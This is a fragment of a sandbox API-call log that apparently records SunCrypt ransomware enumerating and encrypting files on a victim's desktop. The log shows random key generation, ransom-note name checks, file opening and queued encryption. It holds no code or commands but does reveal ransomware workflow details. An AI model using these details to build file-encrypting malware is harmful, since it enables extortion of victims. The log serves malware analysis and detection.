ftLastAccessTime.dwHighDateTime=0x1d7e0a6, ftLastWriteTime.dwLowDateTime=0x41295620, ftLastWriteTime.dwHighDateTime=0x1d7e0a6, nFileSizeHigh=0x0, nFileSizeLow=0xeed8, dwReserved0=0x0, dwReserved1=0x60, cFileName="PfB5zoxaJHleqV31.flv", cAlternateFileName="PFB5ZO~1.FLV")) returned 1 [0166.206] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv") returned 52 [0166.206] lstrcmpW (lpString1="PfB5zoxaJHleqV31.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.206] PathFindExtensionW (pszPath="PfB5zoxaJHleqV31.flv") returned=".flv" [0166.206] lstrlenW (lpString=".flv") returned 4 [0166.207] PathFindExtensionW (pszPath="PfB5zoxaJHleqV31.flv") returned=".flv" [0166.207] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv" (normalized: "c:\\users\\5alr3u30d3\\desktop\\pfb5zoxajhleqv31.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.207] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=61144) returned 1 [0166.207] GetProcessHeap () returned 0x270000 [0166.207] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.208] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv" [0166.208] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.208] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.212] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cba400, ftCreationTime.dwHighDateTime=0x1d7e4a0, ftLastAccessTime.dwLowDateTime=0x40c8f830, ftLastAccessTime.dwHighDateTime=0x1d7e53c, ftLastWriteTime.dwLowDateTime=0x40c8f830, ftLastWriteTime.dwHighDateTime=0x1d7e53c, nFileSizeHigh=0x0, nFileSizeLow=0x19a4, dwReserved0=0x0, dwReserved1=0x60, cFileName="rJo4UNhUAI_.png", cAlternateFileName="RJO4UN~1.PNG")) returned 1 [0166.213] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png") returned 47 [0166.213] lstrcmpW (lpString1="rJo4UNhUAI_.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.213] PathFindExtensionW (pszPath="rJo4UNhUAI_.png") returned=".png" [0166.213] lstrlenW (lpString=".png") returned 4 [0166.213] PathFindExtensionW (pszPath="rJo4UNhUAI_.png") returned=".png" [0166.213] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png" (normalized: "c:\\users\\5alr3u30d3\\desktop\\rjo4unhuai_.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.217] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=6564) returned 1 [0166.218] GetProcessHeap () returned 0x270000 [0166.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.219] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png" [0166.219] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.219] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.226] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefed9ed0, ftCreationTime.dwHighDateTime=0x1d7e4e5, ftLastAccessTime.dwLowDateTime=0xa759b4f0, ftLastAccessTime.dwHighDateTime=0x1d7e4fa, ftLastWriteTime.dwLowDateTime=0xa759b4f0, ftLastWriteTime.dwHighDateTime=0x1d7e4fa, nFileSizeHigh=0x0, nFileSizeLow=0x108c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="SAhcL1 Hws.mp4", cAlternateFileName="SAHCL1~1.MP4")) returned 1 [0166.226] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4") returned 47 [0166.226] lstrcmpW (lpString1="SAhcL1 Hws.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.226] PathFindExtensionW (pszPath="SAhcL1 Hws.mp4") returned=".mp4" [0166.226] lstrlenW (lpString=".mp4") returned 4 [0166.226] PathFindExtensionW (pszPath="SAhcL1 Hws.mp4") returned=".mp4" [0166.226] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4" (normalized: "c:\\users\\5alr3u30d3\\desktop\\sahcl1 hws.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.227] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=67777) returned 1 [0166.227] GetProcessHeap () returned 0x270000 [0166.227] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.228] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4" [0166.228] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.228] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.235] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a6d100, ftCreationTime.dwHighDateTime=0x1d7db37, ftLastAccessTime.dwLowDateTime=0x2e122ff0, ftLastAccessTime.dwHighDateTime=0x1d7e6b2, ftLastWriteTime.dwLowDateTime=0x2e122ff0, ftLastWriteTime.dwHighDateTime=0x1d7e6b2, nFileSizeHigh=0x0, nFileSizeLow=0xbdf6, dwReserved0=0x0, dwReserved1=0x60, cFileName="sBE7Aem.wav", cAlternateFileName="")) returned 1 [0166.236] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav") returned 43 [0166.236] lstrcmpW (lpString1="sBE7Aem.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.236] PathFindExtensionW (pszPath="sBE7Aem.wav") returned=".wav" [0166.236] lstrlenW (lpString=".wav") returned 4 [0166.236] PathFindExtensionW (pszPath="sBE7Aem.wav") returned=".wav" [0166.236] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav" (normalized: "c:\\users\\5alr3u30d3\\desktop\\sbe7aem.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.236] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=48630) returned 1 [0166.236] GetProcessHeap () returned 0x270000 [0166.236] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.237] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="60") returned 2 [0166.237] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="24") returned 2 [0166.237] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="B4") returned 2 [0166.237] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="AA") returned 2 [0166.237] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DA") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="2D") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="7F") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FE") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="A0") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="66") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="99") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="93") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="A8") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="92") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="9A") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="EA") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="D4") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="77") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="AA") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="C8") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="64") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="97") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="4B") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="02") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="64") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="9F") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="2F") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="7C") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="97") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="63") returned 2 [0166.239] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="5F") returned 2 [0166.239] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="47") returned 2 [0166.239] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav" [0166.239] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.239] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49a7500, ftCreationTime.dwHighDateTime=0x1d7d73e, ftLastAccessTime.dwLowDateTime=0x178844f0, ftLastAccessTime.dwHighDateTime=0x1d7da59, ftLastWriteTime.dwLowDateTime=0x178844f0, ftLastWriteTime.dwHighDateTime=0x1d7da59, nFileSizeHigh=0x0, nFileSizeLow=0x104f9, dwReserved0=0x0, dwReserved1=0x60, cFileName="SDwqK.bmp", cAlternateFileName="")) returned 1 [0166.250] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SDwqK.bmp") returned 41 [0166.250] lstrcmpW (lpString1="SDwqK.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.250] PathFindExtensionW (pszPath="SDwqK.bmp") returned=".bmp" [0166.250] lstrlenW (lpString=".bmp") returned 4 [0166.250] PathFindExtensionW (pszPath="SDwqK.bmp") returned=".bmp" [0166.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2654a60, ftCreationTime.dwHighDateTime=0x1d7db27, ftLastAccessTime.dwLowDateTime=0x7b355ae0, ftLastAccessTime.dwHighDateTime=0x1d7dba5, ftLastWriteTime.dwLowDateTime=0x7b355ae0, ftLastWriteTime.dwHighDateTime=0x1d7dba5, nFileSizeHigh=0x0, nFileSizeLow=0x3be3, dwReserved0=0x0, dwReserved1=0x60, cFileName="st3fSkONVrSq.ods", cAlternateFileName="ST3FSK~1.ODS")) returned 1 [0166.250] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods") returned 48 [0166.250] lstrcmpW (lpString1="st3fSkONVrSq.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.250] PathFindExtensionW (pszPath="st3fSkONVrSq.ods") returned=".ods" [0166.250] lstrlenW (lpString=".ods") returned 4 [0166.250] PathFindExtensionW (pszPath="st3fSkONVrSq.ods") returned=".ods" [0166.250] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods" (normalized: "c:\\users\\5alr3u30d3\\desktop\\st3fskonvrsq.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.251] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=15331) returned 1 [0166.251] GetProcessHeap () returned 0x270000 [0166.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.252] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="51") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="36") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="F8") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="7B") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="0C") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="1E") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="1F") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="E4") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="10") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="30") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="AF") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="9D") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="FF") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="D0") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="83") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="69") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="E7") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="91") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="18") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="02") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="88") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="B0") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="21") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="06") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="52") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="5E") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="DB") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="CD") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="BC") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="37") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="F3") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="21") returned 2 [0166.254] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods" [0166.254] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.254] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.262] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a, dwReserved0=0x0, dwReserved1=0x60, cFileName="SunCrypt_26_01_2021_1422KB.ps1", cAlternateFileName="SUNCRY~1.PS1")) returned 1 [0166.262] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1") returned 62 [0166.262] lstrcmpW (lpString1="SunCrypt_26_01_2021_1422KB.ps1", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.262] PathFindExtensionW (pszPath="SunCrypt_26_01_2021_1422KB.ps1") returned=".ps1" [0166.262] lstrlenW (lpString=".ps1") returned 4 [0166.262] PathFindExtensionW (pszPath="SunCrypt_26_01_2021_1422KB.ps1") returned=".ps1" [0166.262] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b8685d0, ftCreationTime.dwHighDateTime=0x1d7da5f, ftLastAccessTime.dwLowDateTime=0x522e2580, ftLastAccessTime.dwHighDateTime=0x1d7e5bb, ftLastWriteTime.dwLowDateTime=0x522e2580, ftLastWriteTime.dwHighDateTime=0x1d7e5bb, nFileSizeHigh=0x0, nFileSizeLow=0x6665, dwReserved0=0x0, dwReserved1=0x60, cFileName="tGZjK0vavLxa.doc", cAlternateFileName="TGZJK0~1.DOC")) returned 1 [0166.262] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc") returned 48 [0166.262] lstrcmpW (lpString1="tGZjK0vavLxa.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.262] PathFindExtensionW (pszPath="tGZjK0vavLxa.doc") returned=".doc" [0166.262] lstrlenW (lpString=".doc") returned 4 [0166.262] PathFindExtensionW (pszPath="tGZjK0vavLxa.doc") returned=".doc" [0166.262] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc" (normalized: "c:\\users\\5alr3u30d3\\desktop\\tgzjk0vavlxa.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.263] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=26213) returned 1 [0166.263] GetProcessHeap () returned 0x270000 [0166.263] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.264] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="5B") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="79") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="79") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="2A") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="26") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="26") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="C0") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="0A") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="A2") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="1F") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="17") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="10") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="6A") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="AB") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="49") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="DD") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="87") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="C6") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="3D") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="56") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="AB") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="D9") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="3F") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="53") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="20") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="7C") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="84") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="25") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="38") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="E5") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="83") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7C") returned 2 [0166.266] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc" [0166.266] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.266] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.277] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86ac5c10, ftCreationTime.dwHighDateTime=0x1d7d976, ftLastAccessTime.dwLowDateTime=0x3f0ef20, ftLastAccessTime.dwHighDateTime=0x1d7e47f, ftLastWriteTime.dwLowDateTime=0x3f0ef20, ftLastWriteTime.dwHighDateTime=0x1d7e47f, nFileSizeHigh=0x0, nFileSizeLow=0x1766e, dwReserved0=0x0, dwReserved1=0x60, cFileName="tObRHMtn3GHXI.pps", cAlternateFileName="TOBRHM~1.PPS")) returned 1 [0166.277] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps") returned 49 [0166.277] lstrcmpW (lpString1="tObRHMtn3GHXI.pps", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.277] 